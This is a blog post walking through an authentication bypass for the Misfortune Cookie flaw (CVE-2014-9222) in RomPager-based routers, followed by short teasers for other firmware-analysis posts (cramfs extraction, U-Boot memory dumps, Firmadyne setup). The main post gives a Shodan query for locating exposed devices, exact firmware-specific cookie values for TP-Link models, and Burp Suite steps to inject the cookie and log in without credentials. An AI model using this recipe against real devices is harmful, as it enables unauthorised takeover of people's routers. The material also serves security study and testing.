CVE-2014-9222 Misfortune Cookie Vulnerability Authentication Bypass

Introduction

AllegroSoft RomPager 4.34 and earlier used in certain devices has a vulnerability which can be exploited to bypass authentication using a crafted cookie.

Device Identification

Identify vulnerable devices using shodan query:

"RomPager/4.07" "EXT:"

Exploit

Each firmware has a specific "number" and "offset" value which can be obtained from: https://github.com/threat9/routersploit/blob/master/routersploit/modules/exploits/routers/multi/misfortune_cookie.py

For TP-Link TD-8816  router with firmware V6_100907 the number is 107369788 and offset is 1. To disable the authentication of this router, cookie to be sent is C107369788=A\x00. For TP-Link TD-8840T V3_110221 number and offset are 107369764 and 5, so cookie would be C107369764=AAAAA\x00.

Intercept the request request sent by login page in BurpSuite Proxy and add the cookie corresponding to the firmware as given in figure below.


Click on Hex tab and edit the value corresponding to 0 from its ASCII value 0x30 to 0x00.


Forward the request in BurpSuite proxy. Now onwards, device will log in without prompting for credentials.

To enable authentication either reboot the device or send a request with cookie C107369788=A\x01

Video



Comments

Post a Comment

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Image
Extract Cramfs Check the endianness of the Cramfs file: file cramfs  This is a big endian file. Convert cramfs  file to little endian file cramfs_le using cramfsswap. cramfsswap cramfs cramfs_le Extract the little endian file  cramfs_le to folder fs using fsck.cramfs. sudo fsck.cramfs --extract=fs cramfs_le Create Cramfs Use mkfs.cramfs to create Cramfs file system from the contents of folder fs .To create a little endian file system: sudo mkfs.cramfs fs cramfs_new For big endian Cramfs file system: sudo mkfs.cramfs -N big fs cramfs_new Video
Read more

Dump memory to file from U-Boot console using Memory Display (md) log

Image
 Introduction Dump firmware or other contents from memory of a device with U-Boot bootloader to a file by converting output of memory display (md) command to binary image.  Steps 1. Connect to U-Boot console using picocom and save all outputs in a log file using commad given below. Here the output is saved to log file named 'mdb.log'. sudo picocom /dev/ttyUSB0 --baud 115200 --logfile mdb.log 2. Display the contents of the memory using command: md.b <address> <length> Figure below shows the command to display memory contents from address 0x400000000 and of length 0x20000 (128KB) . The data in this example corresponds to a jffs2 file system. 3. Once the execution completes, edit the log file and remove everything other than md.b output. 4. Clone the github project uboot-mdb-dump.git git clone https://github.com/gmbnomis/uboot-mdb-dump.git 5. Generate the binary image file 'output.bin' from log file 'mdb.log'. python3 uboot-mdb-dump/uboot_mdb_to_image.p
Read more

Firmadyne Installation & Emulation of Firmware

Image
 Introduction Firmadyne can be used to perform emulation and analysis of Linux based firmware. Installation Install Ubuntu 18.04 LTS and upgrade all packages: sudo apt update sudo apt upgrade Install and configure other packages: sudo apt-get install busybox-static fakeroot git dmsetup kpartx netcat-openbsd nmap python3-psycopg2 snmp uml-utilities util-linux vlan python3-pip python3-magic sudo update-alternatives --install /usr/bin/python python /usr/bin/python3 10 git clone --recursive https://github.com/firmadyne/firmadyne.git git clone https://github.com/ReFirmLabs/binwalk.git cd binwalk sudo ./deps.sh sudo python ./setup.py install cd .. sudo apt-get install postgresql sudo -u postgres createuser -P firmadyne Give firmadyne as password. sudo -u postgres createdb -O firmadyne firmware sudo -u postgres psql -d firmware < ./firmadyne/database/schema cd firmadyne ./download.sh sudo apt-get install qemu-system-arm qemu-system-mips qemu-system-x86 qemu-utils nano firmadyne.config Unco
Read more